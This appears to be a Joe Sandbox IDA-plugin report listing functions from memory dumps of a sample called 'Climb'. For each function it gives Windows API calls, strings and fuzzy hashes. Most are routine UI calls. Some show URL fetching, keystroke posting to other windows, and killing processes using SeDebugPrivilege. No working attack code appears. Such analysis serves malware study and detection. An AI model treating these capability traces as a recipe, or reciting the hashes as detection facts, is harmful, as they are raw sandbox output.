Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: HandleLoadMessageModuleString_wcslen
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 858772685-4153970271
Opcode ID: e2964ebb6d930b7700a1e2ba09f8b8d9078214a98f5a213510572006323d5520
Instruction ID: 8a506a7effcfcc0dfcb295d60bfa2b7ca0912a475f40da2719ef70492d8f41b8
Opcode Fuzzy Hash: e2964ebb6d930b7700a1e2ba09f8b8d9078214a98f5a213510572006323d5520
Instruction Fuzzy Hash: 0D215E3290021EEFCF15ABA0CC0AEFE7B79BF18700F444469B515660A3EB769A58DB11

Function 001129EC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 001129F8
GetClassNameW.USER32(00000000,?,00000100), ref: 00112A0D
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00112A9A

Strings

SHELLDLL_DefView, xrefs: 00112A19
largeicons, xrefs: 00112A2E
details, xrefs: 00112A48
smallicons, xrefs: 00112A62
list, xrefs: 00112A7C

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-3381328864
Opcode ID: f564a79d06b12cf7435996472161d33fcc035fc2281ba010ace12d899959e473
Instruction ID: 43768c6117e0d0f51f081156d28639e428e5349f35b0277a482a5fb25b5e93a7
Opcode Fuzzy Hash: f564a79d06b12cf7435996472161d33fcc035fc2281ba010ace12d899959e473
Instruction Fuzzy Hash: 4C11E97A388707BAFA2C6620FC07DE637ADDF16724B214032F909E74D2FB7568A14914

Function 000B7567 Relevance: 13.8, APIs: 9, Instructions: 291COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 000B758D
GetWindowRect.USER32(?,?), ref: 000B75CE
ScreenToClient.USER32(?,?), ref: 000B75F6
GetClientRect.USER32(?,?), ref: 000B773A
GetWindowRect.USER32(?,?), ref: 000B775B

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 74cfeea82e52cb905cdb71b10d773357f5dfdf1ba1679a59db6cbffb0c35be25
Instruction ID: b41e246826d173c88b1f380923a1c342705ae0266791e1d6874a289846aacb39
Opcode Fuzzy Hash: 74cfeea82e52cb905cdb71b10d773357f5dfdf1ba1679a59db6cbffb0c35be25
Instruction Fuzzy Hash: 6DC15A3990464AEFDF20CFA8C540BEDB7F1FF58310F14841AE899A7650DB35A951EB60

Function 000ED210 Relevance: 13.7, APIs: 9, Instructions: 209COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 000ED237
_free.LIBCMT ref: 000ED2A2
_free.LIBCMT ref: 000ED2C8
_free.LIBCMT ref: 000ED2F1
_free.LIBCMT ref: 000ED329
_free.LIBCMT ref: 000ED35A
_free.LIBCMT ref: 000ED39B
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 000ED41C
_free.LIBCMT ref: 000ED435

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: _free$EnvironmentVariable___from_strstr_to_strchr
String ID:
API String ID: 1282221369-0
Opcode ID: 8bad6e91754f1fc43b7d8003517a9cb82d1d02ebedf85ea0e9c5b50b26b27b2a
Instruction ID: 9cd02237401224cd1f7262056e2d4a57e9a9392a7162c46ab043679d5aee66c1
Opcode Fuzzy Hash: 8bad6e91754f1fc43b7d8003517a9cb82d1d02ebedf85ea0e9c5b50b26b27b2a
Instruction Fuzzy Hash: D3613972904385AFDB21AFB6DC857AE7BE8EF11320F04456FEA44B7283D631DA418751

Function 00145B72 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00145C24
ShowWindow.USER32(?,00000000), ref: 00145C65
ShowWindow.USER32(?,00000005,?,00000000), ref: 00145C6B
SetFocus.USER32(?,?,00000005,?,00000000), ref: 00145C6F

Part of subcall function 001479F2: DeleteObject.GDI32(00000000), ref: 00147A1E

GetWindowLongW.USER32(?,000000F0), ref: 00145CAB
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00145CB8
InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00145CEB
SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00145D25
SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00145D34

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
String ID:
API String ID: 3210457359-0
Opcode ID: 1416883c6b8fca5460d65ffaf644fe4c0dc2ddb2c01758197c2b0da5a9d27724
Instruction ID: f3820b3a7ea31af029da841de7b32db8695578244d6f512fb12716ec2c319c38
Opcode Fuzzy Hash: 1416883c6b8fca5460d65ffaf644fe4c0dc2ddb2c01758197c2b0da5a9d27724
Instruction Fuzzy Hash: 43519D35A40A09BFEF259F64CC89BD83BA7FF05754F148121FA249A1F2C776A980DB41

Function 000B13A6 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 000F28D1
ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 000F28EA
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 000F28FA
ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 000F2912
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 000F2933
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,000B11F5,00000000,00000000,00000000,000000FF,00000000), ref: 000F2942
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 000F295F
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,000B11F5,00000000,00000000,00000000,000000FF,00000000), ref: 000F296E

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: e6108601409badf6b9973b03a269a2bec8484f19cc55e033d28ca9bd9b73c6fb
Instruction ID: e6c97427672cbc650027d0ebafd99c12980434bc98d25ca58c8a88eb79c1724a
Opcode Fuzzy Hash: e6108601409badf6b9973b03a269a2bec8484f19cc55e033d28ca9bd9b73c6fb
Instruction Fuzzy Hash: 41518B34A00209AFDB24CF25DC95BEA7BF5FF48764F104528FA4297AA0DB70E990DB50

Function 0012CB88 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0012CBC7
GetLastError.KERNEL32 ref: 0012CBDA
SetEvent.KERNEL32(?), ref: 0012CBEE

Part of subcall function 0012CC98: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0012CCB7
Part of subcall function 0012CC98: GetLastError.KERNEL32 ref: 0012CD67
Part of subcall function 0012CC98: SetEvent.KERNEL32(?), ref: 0012CD7B
Part of subcall function 0012CC98: InternetCloseHandle.WININET(00000000), ref: 0012CD86

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
String ID:
API String ID: 337547030-0
Opcode ID: 19a496021142b2dc25c804e26116790b7172a636604142e68e3b4cde052a0298
Instruction ID: b7c8e2d513610267fca0588c8792d09efad8ed4618e19e6a6f2ffef0bfaee69d
Opcode Fuzzy Hash: 19a496021142b2dc25c804e26116790b7172a636604142e68e3b4cde052a0298
Instruction Fuzzy Hash: 3F318B75200715AFDB218FA1ED44A6BBBA8FF05314B10452DFA5A83A20C731E864ABA0

Function 00112EEF Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00114393: GetWindowThreadProcessId.USER32(?,00000000), ref: 001143AD
Part of subcall function 00114393: GetCurrentThreadId.KERNEL32 ref: 001143B4
Part of subcall function 00114393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00112F00), ref: 001143BB

MapVirtualKeyW.USER32(00000025,00000000), ref: 00112F0A
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00112F28
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00112F2C
MapVirtualKeyW.USER32(00000025,00000000), ref: 00112F36
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00112F4E
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00112F52
MapVirtualKeyW.USER32(00000025,00000000), ref: 00112F5C
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00112F70
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00112F74

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 15d14dd76f98134d2408b8bcd9fd40719fee77573ed26f93688dcd3618f5558b
Instruction ID: 12acfca20ab4d18933116a0a43191f1f21190642484bfc73c4dec3a37a9cdfb5
Opcode Fuzzy Hash: 15d14dd76f98134d2408b8bcd9fd40719fee77573ed26f93688dcd3618f5558b
Instruction Fuzzy Hash: 5801D8347942107BFB106768EC8AF993F59EB5EF11F110011F718AE1F0C9F154848AA9

Function 00112150 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00111D95,?,?,00000000), ref: 00112159
HeapAlloc.KERNEL32(00000000,?,00111D95,?,?,00000000), ref: 00112160
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00111D95,?,?,00000000), ref: 00112175
GetCurrentProcess.KERNEL32(?,00000000,?,00111D95,?,?,00000000), ref: 0011217D
DuplicateHandle.KERNEL32(00000000,?,00111D95,?,?,00000000), ref: 00112180
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00111D95,?,?,00000000), ref: 00112190
GetCurrentProcess.KERNEL32(00111D95,00000000,?,00111D95,?,?,00000000), ref: 00112198
DuplicateHandle.KERNEL32(00000000,?,00111D95,?,?,00000000), ref: 0011219B
CreateThread.KERNEL32(00000000,00000000,001121C1,00000000,00000000,00000000), ref: 001121B5

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: b75852e853b316f3db85c509449e98cbe42054165501be6dc0852268e4928cd2
Instruction ID: df746398f3f483003bbca3da75ab41865083eff4079890099c87a174ad4eee2b
Opcode Fuzzy Hash: b75852e853b316f3db85c509449e98cbe42054165501be6dc0852268e4928cd2
Instruction Fuzzy Hash: E601BBB9240304BFEB10AFA5EC4DF6B7BACEB89B11F414411FE05DB5A1CA709850CB20

Function 0013AB3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 0011DD87: CreateToolhelp32Snapshot.KERNEL32 ref: 0011DDAC
Part of subcall function 0011DD87: Process32FirstW.KERNEL32(00000000,?), ref: 0011DDBA
Part of subcall function 0011DD87: CloseHandle.KERNEL32(00000000), ref: 0011DE87

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0013ABCA
GetLastError.KERNEL32 ref: 0013ABDD
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0013AC10
TerminateProcess.KERNEL32(00000000,00000000), ref: 0013ACC5
GetLastError.KERNEL32(00000000), ref: 0013ACD0
CloseHandle.KERNEL32(00000000), ref: 0013AD21

Strings

SeDebugPrivilege, xrefs: 0013ABEC

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 3bf86bfef0bd2d2bf75e1661112b93b0ab601ec723add7168a97647b4fa56ee9
Instruction ID: 555c6aeee39da613427dfc408b700de9c537c127ab8fb83baf99d4dd118e80ce
Opcode Fuzzy Hash: 3bf86bfef0bd2d2bf75e1661112b93b0ab601ec723add7168a97647b4fa56ee9
Instruction Fuzzy Hash: 4961B074204241AFD724DF14C495FA5BBE1AF54318F58849CE4A64BBA3C771EC85CB92

Function 00144322 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 001443C1
SendMessageW.USER32(00000000,00001036,00000000,?), ref: 001443D6
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 001443F0
_wcslen.LIBCMT ref: 00144435
SendMessageW.USER32(?,00001057,00000000,?), ref: 00144462
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00144490

Strings

SysListView32, xrefs: 00144393

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: MessageSend$Window_wcslen
String ID: SysListView32
API String ID: 2147712094-78025650
Opcode ID: d6ca43eb439ce5b9f0f34a5645172abde27171527a55e6fa63b6ccb744ebc6c9
Instruction ID: 6bdbb127437c1ed2847aced9759ac4b9c7c59932839456befa4dd622595059a8
Opcode Fuzzy Hash: d6ca43eb439ce5b9f0f34a5645172abde27171527a55e6fa63b6ccb744ebc6c9
Instruction Fuzzy Hash: B941AD71A00319ABDF21DF64CC49BEA7BA9FF48760F14012AF958E72A1D7759D80CB90

Function 0011C625 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0011C6C4
IsMenu.USER32(00000000), ref: 0011C6E4
CreatePopupMenu.USER32 ref: 0011C71A
GetMenuItemCount.USER32(00DEF7D8), ref: 0011C76B
InsertMenuItemW.USER32(00DEF7D8,?,00000001,00000030), ref: 0011C793

Strings

2, xrefs: 0011C6FE
0, xrefs: 0011C66F

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup
String ID: 0$2
API String ID: 93392585-3793063076
Opcode ID: 16757c2adf3ad0db1018cb129973a2129aaf135e47cc833ed4a0ded672e29087
Instruction ID: 51c0a8248d570f7b80af10deab04959e91949b740787a910263088f47e5c23d8
Opcode Fuzzy Hash: 16757c2adf3ad0db1018cb129973a2129aaf135e47cc833ed4a0ded672e29087
Instruction Fuzzy Hash: 26519E706402059BDF18CFB8D884BEEBBF5AF55314F24413AE9119B2E1D7B09981CFA1

Function 0011D11F Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 0011D1BE

Strings

info, xrefs: 0011D15F
question, xrefs: 0011D177
warning, xrefs: 0011D1A7
stop, xrefs: 0011D18F
blank, xrefs: 0011D140

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 638ef0f1eb2c17e2dafdca7eb757fa1748fdd8807a27e89199a5f8f484d968e3
Instruction ID: 6fb63af194de0c4fe102649fc9448191fa03412cfa5f80fc262cd405a563f77e
Opcode Fuzzy Hash: 638ef0f1eb2c17e2dafdca7eb757fa1748fdd8807a27e89199a5f8f484d968e3
Instruction Fuzzy Hash: CD11E93624C316BBEB0D5B54FC82DEA77FC9F05760F21003AF905A62C2E7B4AA804671

Function 0011E73E Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 0011E759
gethostname.WSOCK32(?,00000100), ref: 0011E773
gethostbyname.WSOCK32(?), ref: 0011E780
inet_ntoa.WSOCK32(?), ref: 0011E7C2
_strcat.LIBCMT ref: 0011E7D0
WSACleanup.WSOCK32 ref: 0011E7F5

Strings

0.0.0.0, xrefs: 0011E79E

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 642191829-3771769585
Opcode ID: 7484dfa6781eb253c5a9c22a297e8708a7fdf3a1a261f343bd9b0f833734f4dd
Instruction ID: 1ccd3015fb64afc571c025de0cd05d39cfc0a9e230054d57c2c4da51a1a67bcd
Opcode Fuzzy Hash: 7484dfa6781eb253c5a9c22a297e8708a7fdf3a1a261f343bd9b0f833734f4dd
Instruction Fuzzy Hash: 6B11DA355042157BDF28A7B0EC4AEEE77BCDF41715F0100BAF915A61A2EF748AC186A1

Function 0011F630 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 0011F641
_wcslen.LIBCMT ref: 0011F652
_wcslen.LIBCMT ref: 0011F690
_wcslen.LIBCMT ref: 0011F6C6
_wcslen.LIBCMT ref: 0011F6F6
_wcslen.LIBCMT ref: 0011F706
_wcslen.LIBCMT ref: 0011F742
_wcslen.LIBCMT ref: 0011F771

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: _wcslen$LocalTime
String ID:
API String ID: 952045576-0
Opcode ID: 31d88ee49f7987805c1391d364fc11fac13fc2717b6b61d6aef19934ce242a97
Instruction ID: d758be67004f0d710e60205ef8f7ceb2b0a95ac2e6fccddb52d09461a1f63635
Opcode Fuzzy Hash: 31d88ee49f7987805c1391d364fc11fac13fc2717b6b61d6aef19934ce242a97
Instruction Fuzzy Hash: 0D418265C11214B6CB15EBF88C86ADFB7A8AF05310F518477E518E3262FB34E295C3E6

Function 0014379F Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 001437B7
GetDC.USER32(00000000), ref: 001437BF
GetDeviceCaps.GDI32(00000000,0000005A), ref: 001437CA
ReleaseDC.USER32(00000000,00000000), ref: 001437D6
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00143812
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00143823
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00146504,?,?,000000FF,00000000,?,000000FF,?), ref: 0014385E
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 0014387D

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
